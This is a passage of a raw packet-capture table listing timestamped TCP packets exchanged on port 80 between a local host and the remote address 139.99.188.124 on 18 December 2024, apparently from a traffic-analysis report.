                                                          Dec 18, 2024 09:32:40.467591047 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.468571901 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.468713045 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.468753099 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.469819069 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.469885111 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.469930887 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.471014977 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.471101046 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.471137047 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.472207069 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.472326994 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.472368956 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.473386049 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.473503113 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.473541021 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.474602938 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.474714041 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.474750042 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.476046085 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.476166964 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.476202965 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.477174044 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.477300882 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.477339029 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.478249073 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.478306055 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.478367090 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.480859041 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.481954098 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.481991053 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.483129025 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.483140945 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.483171940 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.483185053 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.483186007 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.483212948 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.484266043 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.484457970 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.484509945 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.485460997 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.485474110 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.485518932 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.486673117 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.486866951 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.486901045 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.487838984 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.488020897 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.488055944 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.489139080 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.489150047 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.489201069 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.490214109 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.490401030 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.490438938 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.491280079 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.491462946 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.491530895 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.492727995 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.492903948 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.492938995 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.493973017 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.493985891 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.494031906 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.494890928 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.495089054 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.495162964 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.496191978 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.496366024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.496403933 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.497411013 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.497586012 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.497622967 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.498800039 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.498812914 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.498859882 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.499872923 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.500050068 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.500082970 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.501090050 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.501101971 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.501159906 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.502320051 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.502491951 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.502526045 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.503566980 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.503580093 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.503628969 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.504775047 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.504949093 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.504986048 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.505830050 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.506006956 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.506046057 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.507061958 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.507242918 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.507281065 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.508292913 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.508455992 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.508502007 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.509660959 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.509834051 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.509866953 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.510685921 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.510698080 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.510735035 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.511904001 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.511917114 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.511967897 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.513200045 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.513391972 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.513430119 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.514759064 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.514934063 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.514971018 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.515655994 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.515666962 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.515677929 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.515707016 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.515758038 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.515799046 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.516758919 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.563030005 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.644768953 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.644856930 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.644915104 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.645430088 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.645580053 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.645617962 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.646568060 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.646656036 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.646694899 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.647862911 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.648791075 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.648848057 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.651684999 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.651696920 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.651715040 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.651726961 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.651736021 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.651767015 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.651839972 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.652617931 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.652657986 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.653834105 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.654009104 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.654056072 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.655050993 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.655062914 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.655100107 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.656096935 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.656272888 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.656310081 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.657311916 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.657490015 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.657531977 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.658523083 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.658696890 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.658736944 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.659765005 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.659939051 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.659976959 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.661032915 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.661045074 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.661087990 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.662281036 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.662293911 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.662354946 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.663477898 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.663647890 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.663686037 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.664510965 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.664681911 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.664766073 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.665714025 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.665889025 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.665925026 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.666924953 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.667087078 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.667135954 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.668157101 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.668329000 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.668365955 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.669565916 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.669578075 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.669631004 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.670639992 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.670707941 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.670748949 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.671897888 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.671909094 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.671947956 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.673053980 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.673065901 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.673115969 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.674118042 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.674276114 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.674315929 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.675436020 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.675628901 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.675672054 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.676698923 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.676712036 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.676748991 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.677747965 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.677942991 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.677983999 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.679167986 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.679181099 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.679228067 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.680099964 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.680258036 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.680308104 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.681474924 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.681669950 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.681710958 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.682744026 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.682755947 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.682805061 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.683794022 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.683959961 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.683998108 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.684241056 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.684252977 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.684294939 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.685105085 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.685218096 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.685261011 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.686331034 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.686439037 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.686481953 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.687561989 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.687669992 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.687705040 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.688721895 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.688811064 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.688853979 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.689924955 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.690049887 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.690092087 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.691108942 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.691235065 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.691272974 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.692318916 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.692408085 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.692451000 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.693717957 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.693821907 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.693881035 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.694824934 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.694932938 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.694973946 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.696115971 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.696244001 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.696280956 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.697309017 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.697438002 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.697782040 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.698333025 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.698441982 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.698481083 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.699592113 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.699752092 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.699793100 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.700819016 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.700951099 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.701008081 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.701950073 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.702106953 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.702156067 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.703193903 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.703365088 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.703406096 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.704370022 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.704530001 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.704575062 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.705560923 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.705653906 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.705693960 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.706759930 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.706866980 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.706904888 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.707957983 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.750391960 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.836890936 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.836954117 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.837116957 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.838244915 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.838294029 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.838304996 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.838345051 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.838395119 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.838438034 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.839318037 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.839457035 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.839502096 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.840507030 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.840660095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.840704918 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.841650009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.841711044 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.841754913 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.842869043 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.842958927 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.842999935 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.844108105 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.844218016 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.844257116 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.845489979 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.845669031 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.845716000 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.846803904 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.846894979 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.846940041 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.847771883 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.847853899 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.847902060 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.848922968 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.849055052 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.849101067 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.850095987 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.850205898 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.850253105 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.851399899 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.851511002 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.851547956 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.852511883 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.852597952 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.852638960 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.853728056 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.853781939 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.853821039 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.854890108 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.855050087 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.855092049 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.856134892 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.856338978 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.856384039 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.857361078 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.857466936 CET8049731139.99.188.124192.168.2.4
